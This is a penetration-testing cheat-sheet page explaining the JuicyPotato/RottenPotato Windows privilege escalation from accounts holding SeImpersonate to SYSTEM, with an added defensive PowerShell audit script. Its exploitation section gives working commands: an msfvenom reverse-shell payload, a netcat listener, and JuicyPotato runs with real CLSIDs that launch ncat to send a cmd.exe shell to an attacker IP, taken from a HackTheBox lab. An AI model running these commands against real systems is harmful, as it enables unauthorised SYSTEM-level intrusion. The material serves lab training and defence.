Leet Sheet
JuicyPotato/RottenPotato


Last updated 2 years ago


Short Summary

If a user account you control holds the SeImpersonate privilege (which most service accounts have), then you can escalate to SYSTEM.

Note: this exploit was effectively patched in Win10 1809 and Windows Server 2019. RoguePotato came out after that and I don't know if/when it was patched. SweetPotato aims to combine the various *Potato exploits into one script for easy exploitation.

Explanation

Requirements

If your user has the SeImpersonate or SeAssignPrimaryToken privilege, then you are effectively SYSTEM. Normal users don't usually have these, but service-level accounts might. You can check this with whoami /all under "Privileges".

You also need to be able to call a DCOM service, which:

  1. implements the IMarshal interface

  2. runs as an elevated user (SYSTEM, Administrator, ...)

Normally this is port 6666, but there are other such services, in case that one is blocked.
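As an added example (not from the Leet Sheet or the JuicyPotato project), here is a PowerShell check a defender or tester can run to see whether a host meets the conditions above: the current token holds one of the two named privileges, and the OS build predates the Windows 10 1809 / Server 2019 fix the summary mentions. It assumes Windows PowerShell 5.1 or later and that build 17763 is the 1809/2019 baseline.

```powershell
# Added audit script (not part of the Leet Sheet). Reports whether the current
# account holds either privilege this page names, and whether the OS build is
# older than 17763 (Windows 10 1809 / Server 2019, where the fix shipped).
$dangerous = @('SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege')

# whoami /priv prints one privilege per line: "<Name>  <Description>  <State>".
# A privilege listed as Disabled still counts: the process can enable it itself.
$held = whoami /priv | ForEach-Object {
    if ($_ -match '^(Se\w+Privilege)\s+.*\s+(Enabled|Disabled)\s*$') {
        [pscustomobject]@{ Name = $Matches[1]; State = $Matches[2] }
    }
}
$hits = @($held | Where-Object { $dangerous -contains $_.Name })

# Win32_OperatingSystem.BuildNumber is a string; compare it as an integer.
$build   = [int](Get-CimInstance Win32_OperatingSystem).BuildNumber
$patched = $build -ge 17763

# One result object: AtRisk is true only when a dangerous privilege is present
# AND the host is older than the build that fixed RottenPotato/JuicyPotato.
[pscustomobject]@{
    Account            = (whoami)
    ImpersonationPrivs = ($hits | ForEach-Object { "$($_.Name) ($($_.State))" }) -join ', '
    OSBuild            = $build
    FixedBuild         = $patched
    AtRisk             = ($hits.Count -gt 0) -and (-not $patched)
}
```

AtRisk reflects only the fix the summary cites; it says nothing about the later *Potato variants mentioned there. If a service account shows up with these privileges and does not need them, that is the finding to raise.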

Tokens

Every process has an access token, which specifies what kinds of actions it can take. With the right privileges, Windows allows you to impersonate tokens, either just to identify another user or to perform actions on that user's behalf.

There are basically two kinds of impersonation tokens:

  • Delegate/impersonate - these allow you to perform actions as the impersonated user.

  • Identify/anonymous - these only identify the caller and don't allow you to perform actions.

If you can obtain a delegate/impersonate-level impersonation token for SYSTEM, then you can perform actions as SYSTEM.

How It Works

How RottenPotato works at a high level:

  1. Trick the “NT AUTHORITY\SYSTEM” account into authenticating via NTLM to a TCP endpoint we control.

  2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the “NT AUTHORITY\SYSTEM” account. This is done through a series of Windows API calls.

  3. Impersonate the token we have just negotiated. This can only be done if the attacker's current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts.

Exploitation

You're going to need something for JuicyPotato to execute when it finishes successfully. For example, you could generate a reverse shell.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.20" LPORT=8002 -f exe > reverse.exe

Listen for the reverse shell on your machine:

nc -lnvp 8002

On the victim machine, execute JuicyPotato (in this case the x86 variant):

.\JuicyPotato.x86.exe -l 1337 -c "CLSID_HERE" -p C:\path\to\reverse.exe -t *

For example, in the hackthebox "devel" machine, this was the successful exploit (my reverse.exe was in the inetpub/wwwroot directory):

.\JuicyPotato.x86.exe -l 1337 -c "{4B635ECB-0887-4015-8CA6-D621362F98D1}" -p C:\inetpub\wwwroot\reverse.exe -t *

Alternatively, you can use it with a static ncat.exe file:

.\JuicyPotato.x86.exe -l 1337 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}" -p c:\windows\system32\cmd.exe -a "/c C:\Users\Public\ncat.exe -e cmd.exe 10.10.14.17 8002" -t *

External Links

First of all, download the executable. If the official release isn't working, try an .

You're probably going to need to test multiple CLSIDs before you get a working one.

  • juicypotato
  • x86 version
  • Here is a list of CLSIDs to try.
  • SweetPotato
  • GitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. (GitHub)
  • Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM (foxglovesec): technical explanation of RottenPotato, which JuicyPotato is based on
  • Blackhat technical talk about tokens